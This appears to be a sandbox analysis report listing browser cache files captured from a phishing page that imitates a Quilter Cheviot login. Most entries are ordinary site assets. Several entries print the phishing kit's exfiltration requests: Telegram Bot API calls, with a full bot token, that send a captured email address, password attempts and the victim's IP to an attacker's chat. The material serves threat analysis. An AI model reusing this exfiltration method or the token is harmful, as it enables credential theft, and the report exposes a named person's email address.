                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:06967FFBF782D5107BC19AAB9777C1F5
                                                    SHA1:F0A1CB4E3AEE2FB9F0AB6372BBE7E260F0D62735
                                                    SHA-256:5CAA792217F57C62B3AAF8150C06204CD9DF01F9284306A23B383A572BCB0512
                                                    SHA-512:1DC0E6FF51D0A75ED401EB3694DCE61CE226EA15D4B00C04766FE5BF0FDAEF3D509B96DB9F50445B9C6FE355757FB463BFE02A9AD1E701E77DC6B34FFCC5811C
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:<svg width="13" height="13" viewBox="0 0 13 13" fill="none". xmlns="http://www.w3.org/2000/svg">. <path d="M5.65576 12L11.3126 6.34315L5.65576 0.686292" stroke="#ffffff" stroke-width="1.5"/>.</svg>.

                                                    Chrome Cache Entry: 117

                                                    Download File
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):709
                                                    Entropy (8bit):5.215151865889006
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:49E466420DBA4D3B00FF5C23D9019FC2
                                                    SHA1:87BE82AEA1EBB4D36974B422910DBB4C966F5E92
                                                    SHA-256:A29662D0B97927CAF660862537BAE13D96FB7CECF008628EB11FD89195E328CE
                                                    SHA-512:30E86286E5856DEE9745F7FB25535A7EDAD9E90AB2C443FE3D6BBADA0FFF56BA33661D509538D4080C57E6C1C88351CA7C35F55FABEAF36451874C84B15BB072
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:{"ok":true,"result":{"message_id":633,"from":{"id":6800467599,"is_bot":true,"first_name":"US Unlimited","username":"usunlimitedbot"},"chat":{"id":6522132099,"first_name":"\"Olk","type":"private"},"date":1742906921,"text":"\ud83d\udd39 First Password Attempt \ud83d\udd39\n\n\ud83d\udce7 Email: charles.mesquita@quiltercheviot.com\n\ud83d\udd11 Password 1: hAhAhA\n\ud83c\udf0d IP: 161.77.13.20\n\ud83c\udff3\ufe0f Country: US\n\ud83d\udd17 Login URL: https://mail.mxa-0036ff01.gslb.pphosted.com","entities":[{"offset":40,"length":35,"type":"email"},{"offset":105,"length":12,"type":"url"},{"offset":148,"length":43,"type":"url"}],"link_preview_options":{"url":"https://mail.mxa-0036ff01.gslb.pphosted.com/"}}}

                                                    Chrome Cache Entry: 119

                                                    Download File
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:JSON data
                                                    Category:downloaded
                                                    Size (bytes):744
                                                    Entropy (8bit):5.25165212413263
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:AAC406B67EB6BBBAE50FFDC5A0CD9E1E
                                                    SHA1:2C2ED5AF08765FA1B6D9E46A0990E9C410D59EB2
                                                    SHA-256:7FB3DAE66DCCB30D330E7F9689FFDC451BD7FAB9500F3CE6E54F0176E31DC292
                                                    SHA-512:F59EEAEB8D3B9B2829790611D9BE5BB01BEDB35B65E6172D0810EAD3B84419525EF0CA73C8DBB47CCE1F30A8D24A0108AC91320E99156B754E8E69E611CB1357
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://api.telegram.org/bot6800467599:AAGHIthuSv3CWGlzgsGIwx9GWQJ2OnFzEfE/sendMessage?chat_id=6522132099&text=%F0%9F%94%B9%20Second%20Password%20Attempt%20%F0%9F%94%B9%0A%0A%F0%9F%93%A7%20Email%3A%20charles.mesquita%40quiltercheviot.com%0A%F0%9F%94%91%20Password%201%3A%20hAhAhA%0A%F0%9F%94%91%20Password%202%3A%20RUBBISH%0A%F0%9F%8C%8D%20IP%3A%20161.77.13.20%0A%F0%9F%8F%B3%EF%B8%8F%20Country%3A%20US%0A%F0%9F%94%97%20Login%20URL%3A%20https%3A%2F%2Fmail.mxa-0036ff01.gslb.pphosted.com
                                                    Preview:{"ok":true,"result":{"message_id":634,"from":{"id":6800467599,"is_bot":true,"first_name":"US Unlimited","username":"usunlimitedbot"},"chat":{"id":6522132099,"first_name":"\"Olk","type":"private"},"date":1742906941,"text":"\ud83d\udd39 Second Password Attempt \ud83d\udd39\n\n\ud83d\udce7 Email: charles.mesquita@quiltercheviot.com\n\ud83d\udd11 Password 1: hAhAhA\n\ud83d\udd11 Password 2: RUBBISH\n\ud83c\udf0d IP: 161.77.13.20\n\ud83c\udff3\ufe0f Country: US\n\ud83d\udd17 Login URL: https://mail.mxa-0036ff01.gslb.pphosted.com","entities":[{"offset":41,"length":35,"type":"email"},{"offset":129,"length":12,"type":"url"},{"offset":172,"length":43,"type":"url"}],"link_preview_options":{"url":"https://mail.mxa-0036ff01.gslb.pphosted.com/"}}}

                                                    Chrome Cache Entry: 121

                                                    Download File
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (64728)
                                                    Category:downloaded
                                                    Size (bytes):212804
                                                    Entropy (8bit):6.018699593769891
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:34F7E53CA178D4DADD84D4763B964BDB
                                                    SHA1:D4EC7AFD1438FC9F8BD26444F58395D03DFAFAC0
                                                    SHA-256:A309CCEF3111D30D2EAFBB8D3244768E9540D25441F7AF565B7E083E323A39B7
                                                    SHA-512:B86F8A7A93606338CD2B69AD45A5233ED0A676FA9CAAA64D2937C8F370BABFBBBF1AF918A1AA357E7E406708B7774AA8D638D38FC546A2867F9DC769CB95BF76
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://www.quiltercheviot.com/Content/Fonts/866831/B4C49007D12296CAC.css
                                                    Preview:./*..Copyright (C) 2011-2023 Hoefler & Co...This software is the property of Hoefler & Co. (H&Co)...Your right to access and use this software is subject to the..applicable License Agreement, or Terms of Service, that exists..between you and H&Co. If no such agreement exists, you may not..access or use this software for any purpose...This software may only be hosted at the locations specified in..the applicable License Agreement or Terms of Service, and only..for the purposes expressly set forth therein. You may not copy,..modify, convert, create derivative works from or distribute this..software in any way, or make it accessible to any third party,..without first obtaining the written permission of H&Co...For more information, please visit us at http://typography.com...341602-145411-20230905.*/..@font-face{ font-family: "Gotham SSm A"; src: url(data:application/x-font-woff2;base64,d09GMgABAAAAAEgQABIAAAAArggAAEepAAFNDgAAAAAAAAAAAAAAAAAAAAAAAAAAGh4btwYcgQAGYACINAhOCYJhEQwKgcx8gbZqEqAwA

                                                    Chrome Cache Entry: 122

                                                    Download File
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:RIFF (little-endian) data, Web/P image
                                                    Category:downloaded
                                                    Size (bytes):9270
                                                    Entropy (8bit):7.961541037542469
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:9A6100F926A2BFC88338A77A3C511B68
                                                    SHA1:BF8BE459CA1D0A4DF49FE1CD2573D987FEB8AC14
                                                    SHA-256:C8165B7DC34B2A29B21C9188BCE617A7519F6259B4465E0B3472880B1017F79B
                                                    SHA-512:DB6F51A7E010B33FAE7BCD7D84C36F256C68CEFB86DF6BD034044EF890F0B5DB19C084D4F6729A1C18C71074A23B1DFD229C7BE0C28881328B9C8455304EEA68
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://www.quiltercheviot.com/4ad25c/globalassets/logos/qc-logos/qcfavicon512x512.png
                                                    Preview:RIFF.$..WEBPVP8L!$../....Uiz......5c..P.R.Q..8.V....s.9.s.9u.:H.Z.M...Y..EU..s.....>./......y..&-....6.FcR..P':..r..]'.jB...."...i.l/{it...Z........? .lk5.2H.Dh.....t...2g.0[.(.%..(.r. .s.9..*.....$0....O...X.(t+..H`.s....v'b\...D...:,.tZ.e.@...a(...Y.^.....B.H..P`XHNK.....U..A.....a.....r.P. .........9{.jA.,... ..Q.I.rXz.K..h[{....]....<.v.Aha.0m. ..J.....{.}l.m.m.m.m.n......0......^........_.%.......E...L.,Y..^.G....=...v...H...`...r.h&`........&u.O...o.h* ..." .....W.w6....pN.d...$........p.Mu.......pD.H.#.l...Mx._.l..V@..../.....f.^./.....ft....=/...~.Xs%...% ....n...pK@..oL.q.......%.......6..R...A@ac.... ...0...n..J2I..hc...".....~)......t....f.._..}e..Xy..#..#...%..M...K@C..X..x)..c..w1V..{;.v.X..x$.....,`..X...0@@.Ci)`.+...t .r..J.'....'S...W@c..Y.&.p..B..b.+`...N@.s....[@..}..'X..8..~......\.....\.......n..GY...dvR.}.2.ii.?K.QV..N.........<..6d.,`....g.,....I.zJ..HW.q^V..~.....a%....n...XQ...k..[YY7..b.PWm...E5..Ya.x....,g.-`......z`-cT.m...4+o.s...IR_I...

                                                    Chrome Cache Entry: 123

                                                    Download File
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):666
                                                    Entropy (8bit):5.221701748723922
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:7AB2342F7A25115DEADD60F3DC269F87
                                                    SHA1:473DC91CEACA49FA50E45D2367FE97A15D270A8E
                                                    SHA-256:8C205E700C20F515147915193D8F12E60A3D90692DB6FA49BDD8ED4AF5F0711B
                                                    SHA-512:B306E01699931EE338EB32BFE2404E7D82BAB0E9D0DD01F3E100D9E103538A9ADEA207D27A01F548A572F03274AB0101F5F6072E23BD28DD9762CC52F92E43D3
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:{"ok":true,"result":{"message_id":635,"from":{"id":6800467599,"is_bot":true,"first_name":"US Unlimited","username":"usunlimitedbot"},"chat":{"id":6522132099,"first_name":"\"Olk","type":"private"},"date":1742906941,"text":"\ud83d\udd39 Second Password Attempt \ud83d\udd39\n\n\ud83d\udce7 Email: charles.mesquita@quiltercheviot.com\n\ud83d\udd11 Password 1: hAhAhA\n\ud83d\udd11 Password 2: RUBBISH\n\ud83c\udf0d IP: 161.77.13.20\n\ud83c\udff3\ufe0f Country: US\n\ud83d\udd17 Login URL: https://mail.mxa-0036ff01.gslb.pphosted.com","entities":[{"offset":41,"length":35,"type":"email"},{"offset":129,"length":12,"type":"url"},{"offset":172,"length":43,"type":"url"}]}}

                                                    Chrome Cache Entry: 127

                                                    Download File
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text
                                                    Category:downloaded
                                                    Size (bytes):1971
                                                    Entropy (8bit):5.4820143584135
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:D89E3693CBFDE1C900DA2A1471DE9ECC
                                                    SHA1:7FEE5A88DFF28CABE8E216F8BD343461D25ABAE0
                                                    SHA-256:E4F66092B0948F5C03B3609778B2765B1735A959ADEEF22FFED12B44D955FD8A
                                                    SHA-512:ECC58C709221BFC3132ABFD6D112000FE17E3AD9FCE98213930603F7A52331A2D663BB00C1F3F4545C512CB752D47670E432E8FD4D6E148C883CF9ED9C0DA997
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:"https://fonts.googleapis.com/css2?family=Cormorant:ital,wght@1,700&display=swap"
                                                    Preview:/* cyrillic-ext */.@font-face {. font-family: 'Cormorant';. font-style: italic;. font-weight: 700;. font-display: swap;. src: url(https://fonts.gstatic.com/s/cormorant/v21/H4c0BXOCl9bbnla_nHIq6oGzilJm9otsA9kQTPBa4iWq4Ys.woff2) format('woff2');. unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;.}./* cyrillic */.@font-face {. font-family: 'Cormorant';. font-style: italic;. font-weight: 700;. font-display: swap;. src: url(https://fonts.gstatic.com/s/cormorant/v21/H4c0BXOCl9bbnla_nHIq6oGzilJm9otsA9kQTPBa6yWq4Ys.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./* vietnamese */.@font-face {. font-family: 'Cormorant';. font-style: italic;. font-weight: 700;. font-display: swap;. src: url(https://fonts.gstatic.com/s/cormorant/v21/H4c0BXOCl9bbnla_nHIq6oGzilJm9otsA9kQTPBa4CWq4Ys.woff2) format('woff2');. unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0

                                                    Chrome Cache Entry: 128

                                                    Download File
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (1572)
                                                    Category:downloaded
                                                    Size (bytes):39846
                                                    Entropy (8bit):5.378133485312082
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:0894998DB0FA79BDF9F520EDDA652B7F
                                                    SHA1:4C0BEA18A33CEF56223FB3954F573040E970B9A7
                                                    SHA-256:2A4B3DD37CCBB39268DECD6E8FCB6E58D334DD1A208375EB1DA0259C866624EE
                                                    SHA-512:D6398433D07388ADD9C9A7177D8686DB34A0283F730D72493BFB786BEA2BEBA70A2D5071955E7B12E0C94969AAAF67953839377DD237AE6E56AE283856ADC513
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:"https://fonts.googleapis.com/css2?family=Open+Sans:ital,wght@0,400;0,600;0,700;1,400;1,600;1,700&family=Frank+Ruhl+Libre:wght@300;400;700&display=swap"
                                                    Preview:/* hebrew */.@font-face {. font-family: 'Frank Ruhl Libre';. font-style: normal;. font-weight: 300;. font-display: swap;. src: url(https://fonts.gstatic.com/s/frankruhllibre/v21/j8_w6_fAw7jrcalD7oKYNX0QfAnPW7Ll4ajn.woff2) format('woff2');. unicode-range: U+0307-0308, U+0590-05FF, U+200C-2010, U+20AA, U+25CC, U+FB1D-FB4F;.}./* latin-ext */.@font-face {. font-family: 'Frank Ruhl Libre';. font-style: normal;. font-weight: 300;. font-display: swap;. src: url(https://fonts.gstatic.com/s/frankruhllibre/v21/j8_w6_fAw7jrcalD7oKYNX0QfAnPW77l4ajn.woff2) format('woff2');. unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;.}./* latin */.@font-face {. font-family: 'Frank Ruhl Libre';. font-style: normal;. font-weight: 300;. font-display: swap;. src: url(https://fonts.gstatic.com/s/frankruhllibre/v21/j8_w6_fAw7jrcalD7oKYNX0Qf

                                                    Chrome Cache Entry: 129

                                                    Download File
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (5985), with no line terminators
                                                    Category:downloaded
                                                    Size (bytes):5985
                                                    Entropy (8bit):5.399300699584419
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:4F955D7F9E008DF9EA534BD688936C57
                                                    SHA1:C4CF1794D4828E43A7BE565E2B0B5CA5B1CCA90B
                                                    SHA-256:D2494539D4A695CC761C69F11D9D00FFC1034D2ED3893519FD03E6F1531B916D
                                                    SHA-512:5EBC0A2819EC7813C1DE357FC2605F9F16D79930748E7B1627E343937AF3BAAFF7BB866109DD4D8066B70EA1E577EECDD28236AA07BBF1ADBD665E60287E8259
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://www.quiltercheviot.com/Util/Find/epi-util/find.js
                                                    Preview:function FindApi(){var e=this;e._applicationUrl="/",e._serviceApiBaseUrl="",e._trackId="",e._trackParam="_t_",e._dontTrackQueryParam="_t_dtq",e._allowTrackingCookieName=null,e._bufferTrackRequest=!0,e.setApplicationUrl=function(t){e._applicationUrl=t},e.setServiceApiBaseUrl=function(t){e._serviceApiBaseUrl=t},e.setAllowTrackingCookieName=function(t){e._allowTrackingCookieName=t},e.setTrackParam=function(t){e._trackParam=t},e.setDontTrackQueryParam=function(t){e._dontTrackQueryParam=t},e.bindWindowEvents=function(){window.history&&(window.onbeforeunload=function(){var t=document.location.href;t.indexOf("q=")>0&&-1==t.indexOf(e._dontTrackQueryParam+"=")&&window.history.replaceState(window.history.state,window.document.title,t+(t.indexOf("?")>0?"&":"?")+e._dontTrackQueryParam+"=true")}),window.addEventListener("load",e.bindClickEvents(),!1)},e.bindClickEvents=function(){var t=e._toArray(document.getElementsByTagName("A")),r=document.createElement("A");r.href=document.location.href;for(var

                                                    Chrome Cache Entry: 130

                                                    Download File
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:SVG Scalable Vector Graphics image
                                                    Category:dropped
                                                    Size (bytes):32263
                                                    Entropy (8bit):4.871641213360622
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:B27498B828E659CA31193B637C9815F2
                                                    SHA1:866C471C2F1AD751B3C3BD7F3DE39F6B802ABF2F
                                                    SHA-256:2A46DFD5AAC7C00FF2958ADA36D560A87767BBA2ADBC8F966545425B87C37590
                                                    SHA-512:5AD38EDA78BBB3135847B592004A93173404003C12CEA0D27EF9AFE7D03ACA7E42FC8D83922F24B9BD72E20A9F3E70AA318F0A779031D6C1D646DD3C4A94A283
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:<?xml version="1.0" encoding="utf-8"?><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><symbol fill="none" viewBox="0 0 27 27" id="address" xmlns="http://www.w3.org/2000/svg"><path d="M.95 25.999v.066l.064-.018 7.59-2.181 7.373 2.055.013.003.013-.003 7.821-2.143.037-.01V12.083H23.11V23.23l-7.075 1.96-7.417-2.055-.013-.003-.014.003-6.888 1.957V8.515l6.902-1.96 4.983 1.383.047.013.014-.047.174-.589.014-.048-.048-.014-5.17-1.47-.014-.004-.014.004L.986 7.967l-.036.01V26z" fill="currentColor" stroke="currentColor" stroke-width=".1"/><path d="M16.388 12.301v-.05H15.636v13.377H16.388V12.301zM9.002 6.167v-.05H8.25v17.41H9.002V6.168z" fill="currentColor" stroke="currentColor" stroke-width=".1"/><path d="M19.69 16.915l.046.05.034-.059.214-.372c.024-.025.037-.05.047-.07v-.001a.171.171 0 01.035-.05c.131-.128.252-.266.371-.402h0c.12-.137.239-.272.367-.396.523-.506 1.002-1.054 1.48-1.6h0s0 0 0 0c1.086-1.218 2.22-2.525 3.005-4.086 1.006-1.946 1.007-3.854.043-5.635-1.

                                                    Chrome Cache Entry: 134

                                                    Download File
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (1236)
                                                    Category:downloaded
                                                    Size (bytes):20705
                                                    Entropy (8bit):5.470065366668187
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:9E67DCDB1F1B369CB5D5D77EB947102A
                                                    SHA1:EF6A1C09FE34FAD919456157FF0C66BCDC03DF3A
                                                    SHA-256:2E169E8A7BD2F1F80187C99B59ECEAA1E3233D030361802F717D31DA1312323C
                                                    SHA-512:FA1746D661425F6113E2E6884BB35074169FDD4C43345C797945FE10858EDA9A2E68F89CBD8EDC8F0976BF0420690D13FD82C80D217544C839F851C117FFD00E
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://www.googletagmanager.com/static/service_worker/53k0/sw.js?origin=https%3A%2F%2Fwww.quiltercheviot.com
                                                    Preview:'use strict';var aa=function(a){function b(d){return a.next(d)}function c(d){return a.throw(d)}return new Promise(function(d,e){function f(g){g.done?d(g.value):Promise.resolve(g.value).then(b,c).then(f,e)}f(a.next())})},h=function(a){return aa(a())};/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var n={},r=null,x=function(a){var b=3;b===void 0&&(b=0);w();const c=n[b],d=Array(Math.floor(a.length/3)),e=c[64]||"";let f=0,g=0;for(;f<a.length-2;f+=3){const p=a[f],q=a[f+1],A=a[f+2],v=c[p>>2],m=c[(p&3)<<4|q>>4],t=c[(q&15)<<2|A>>6],u=c[A&63];d[g++]=""+v+m+t+u}let k=0,l=e;switch(a.length-f){case 2:k=a[f+1],l=c[(k&15)<<2]||e;case 1:const p=a[f];d[g]=""+c[p>>2]+c[(p&3)<<4|k>>4]+l+e}return d.join("")},B=function(a){const b=a.length;let c=b*3/4;c%3?c=Math.floor(c):"=.".indexOf(a[b-1])!=-1&&(c="=.".indexOf(a[b-.2])!=-1?c-2:c-1);const d=new Uint8Array(c);let e=0;ba(a,function(f){d[e++]=f});return e!==c?d.subarray(0,e):d},ba=function(a,b){function c(e){for(;d<a.len

                                                    Chrome Cache Entry: 136

                                                    Download File
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (65409)
                                                    Category:downloaded
                                                    Size (bytes):122876
                                                    Entropy (8bit):5.398980025961359
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:B17CAEC5470617BB0CB958D86B76AD26
                                                    SHA1:9E05DE6DE80EC3A13A6E1E72C490C0DEF4EF6D66
                                                    SHA-256:12E7192855D64B8867E792C9E0359A8E0B5AE2E2C9286007C9E4B881D86E7E07
                                                    SHA-512:4214CE215830C4A4EDE96C2D7F748B676DD9EB55CE369E6557508E1858DB4DDCFF298DEFC6D1FB743D688801C29614E3036FBA94C7B7F5B5A9E7070A45BD9DF2
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://js.monitor.azure.com/scripts/b/ai.2.gbl.min.js
                                                    Preview:/*!. * Application Insights JavaScript SDK - Web, 2.8.18. * Copyright (c) Microsoft and contributors. All rights reserved.. */.!function(e,n){var t,r={},i="__ms$mod__",o={},a=o.esm_ai_2_8_18={},u="2.8.18",c="Microsoft",s=(s=e=e[c]=e[c]||{})[c="ApplicationInsights2"]=s[c]||{},l=(l=e)[c="ApplicationInsights"]=l[c]||{},e=s[i]=s[i]||{},f=e.v=e.v||[],c=l[i]=l[i]||{},d=c.v=c.v||[];for(t in(c.o=c.o||[]).push(o),n(r),r)s[t]=r[t],f[t]=u,l[t]=r[t],d[t]=u,(a.n=a.n||[]).push(t)}(this,function(e){"use strict";!function(e,n,t){var r=Object.defineProperty;if(r)try{return r(e,n,t)}catch(i){}typeof t.value!==undefined&&(e[n]=t.value)}(e,"__esModule",{value:!0});var a="function",u="object",ne="undefined",te="prototype",c="hasOwnProperty",l=Object,x=l[te],I=l.assign,w=l.create,b=l.defineProperty,T=x[c],C=null;function re(e){e=!1===(e=void 0===e||e)?null:C;return e||((e=(e=(e=typeof globalThis!==ne?globalThis:e)||typeof self===ne?e:self)||typeof window===ne?e:window)||typeof global===ne||(e=global),C=e),e

                                                    Chrome Cache Entry: 137

                                                    Download File
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:SVG Scalable Vector Graphics image
                                                    Category:downloaded
                                                    Size (bytes):200
                                                    Entropy (8bit):5.0126792595955
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:56B0567965A5A578B0A6BD9500D29F79
                                                    SHA1:E02910CB931CE33F8455E737568B3F91683325EE
                                                    SHA-256:0459640A8FC17DE5038A8AE1842DE5A963C99E715CC4E6321890D3DAB73CC248
                                                    SHA-512:1727E91DADF07601450A2DDE4E0CFCD581944938519BE0D35FC0755D48719E9B0F413AF85A9821B94C95206D681E63B0910C1D0A8BC8CB0C75EDACAD79C475D8
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://www.quiltercheviot.com/Content/images/v3/themes/qc/chevron.svg
                                                    Preview:<svg width="13" height="13" viewBox="0 0 13 13" fill="none". xmlns="http://www.w3.org/2000/svg">. <path d="M5.65576 12L11.3126 6.34315L5.65576 0.686292" stroke="#023843" stroke-width="1.5"/>.</svg>.

                                                    Chrome Cache Entry: 87

                                                    Download File
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (6129)
                                                    Category:downloaded
                                                    Size (bytes):372190
                                                    Entropy (8bit):5.604347632707114
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:60B8E379BB8191C4709727AD9F233B10
                                                    SHA1:E67C41F64B148B4C8440931097635CA64D4CF7A0
                                                    SHA-256:C3BFECFED8896FD17129935A0ABC87A8A9B3B10433AAE5FB6443714220A4B0BF
                                                    SHA-512:40A3C788DD333BC7301A1EFCE56643C48E61A14049933ABDF9CBD6535752B78A83161C747688DF17775B0FC0585E3D969A79393BAB342CEA18D98CA6D20C37BA
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://www.googletagmanager.com/gtag/js?id=G-SV2T56L986&l=dataLayer&cx=c&gtm=45He53l1h1v76305953za200&tag_exp=102482433~102788824~102803279~102813109
                                                    Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"1",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_1p_data_v2","priority":13,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_manualEmailEnabled":false,"vtp_cityValue":"","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneValue":"","vtp_autoPhoneEnabled":false,"vtp_emailValue":"","vtp_firstNameValue":"","vtp_streetValue":"","vtp_autoAddressEnabled":false,"vtp_regionValue":"","vtp_countryValue":"","vtp_isAutoCollectPiiEnabledFlag":false,"tag_id":6},{"function":"__ccd_ga_first","priority":12,"vtp_instanceDestinationId":"G-SV2T56L986","tag_id":20},{"function":"__set_product_settings","priority":11,"vtp_instanceDestinationI

                                                    Chrome Cache Entry: 88

                                                    Download File
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):430
                                                    Entropy (8bit):5.155837157818456
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:D3B22219C1744022D045A79772B0363C
                                                    SHA1:3E0FBA97969AB1B9BB918A9D608EAEB2C7722D53
                                                    SHA-256:F6A2B6309A29197D62E31DB1CCE2FBD2C2B37625E087C118A438030BDF24B216
                                                    SHA-512:CB21170676C4B8E023741C0D1490BB3C668CDFA2EB0DC8B2C3B5F32E5813C5D48FDF9E59680551FC605740276F68EB7BDF7F2CD28BBA0D8DA1BD8C7A2A5D9145
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:[{"MessageId":172680,"Title":"Important notice","MessageText":"We are aware of ongoing impersonation fraud attempts.","CtaLinkText":"See more information ","CtaLinkUrl":"https://www.quiltercheviot.com/login/#fraudwarning","OpenInNewTab":false,"EffectiveFrom":"2024-01-10T17:03:00+00:00","EffectiveTo":"9999-12-31T00:00:00Z","MessageType":"platform-issue","Order":1,"LastUpdatedOn":"2024-01-29T09:52:57+00:00","Dismissible":false}]

                                                    Chrome Cache Entry: 89

                                                    Download File
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                    Category:downloaded
                                                    Size (bytes):335587
                                                    Entropy (8bit):5.418392229239681
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:9CC69787B5B797967607B4FF515E8A03
                                                    SHA1:85E72D05B1B77F02C93F6554DF74B266D2826A1C
                                                    SHA-256:5A27761ECE752747FC51CB8BB7664A45B4BB8B6BB83DF735B9D5CF13E02DC0D1
                                                    SHA-512:9842B1B794734D4EE37C1194A68B23FD93193EF4786894319216D26BF7BE0223C88DADCEDD1F1C69C4BC507E38EFA4EC48CD1FA6288092DB784C10C022B69B61
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cc.cdn.civiccomputing.com/9/cookieControl-9.9.2.min.js
                                                    Preview:(()=>{var t={9669:(t,e,n)=>{t.exports=n(1609)},5448:(t,e,n)=>{"use strict";var r=n(4867),o=n(6026),i=n(4372),c=n(5327),a=n(4097),s=n(4109),u=n(7985),l=n(5061),f=n(7874),p=n(5263);t.exports=function(t){return new Promise((function(e,n){var d,h=t.data,g=t.headers,y=t.responseType;function v(){t.cancelToken&&t.cancelToken.unsubscribe(d),t.signal&&t.signal.removeEventListener("abort",d)}r.isFormData(h)&&delete g["Content-Type"];var b=new XMLHttpRequest;if(t.auth){var m=t.auth.username||"",x=t.auth.password?unescape(encodeURIComponent(t.auth.password)):"";g.Authorization="Basic "+btoa(m+":"+x)}var w=a(t.baseURL,t.url);function k(){if(b){var r="getAllResponseHeaders"in b?s(b.getAllResponseHeaders()):null,i={data:y&&"text"!==y&&"json"!==y?b.response:b.responseText,status:b.status,statusText:b.statusText,headers:r,config:t,request:b};o((function(t){e(t),v()}),(function(t){n(t),v()}),i),b=null}}if(b.open(t.method.toUpperCase(),c(w,t.params,t.paramsSerializer),!0),b.timeout=t.timeout,"onloadend"

                                                    Chrome Cache Entry: 90

                                                    Download File
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                    Category:downloaded
                                                    Size (bytes):507499
                                                    Entropy (8bit):5.227401749837294
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:C0C3349B0D3E91E2099A81F4E15F0D3A
                                                    SHA1:9949EA6A1E427D4235AEAD4B1FCB7CD142F51DC5
                                                    SHA-256:05B82BE7161C76AB88B69789928674CB8EC55C2ACF9FB00A8739785BC231D67C
                                                    SHA-512:5CF2BD598851264B444FE6C872A2A40A974D7A64E9C6C1D97CD1C7C7FD3A22547B5FD08B14D424F231FAE77F489EE77BDEBA96A16AB4496CA83834E6DAF3D8D3
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://www.quiltercheviot.com/Content/css/dist/v3/global.css?v=2.5.0.20037
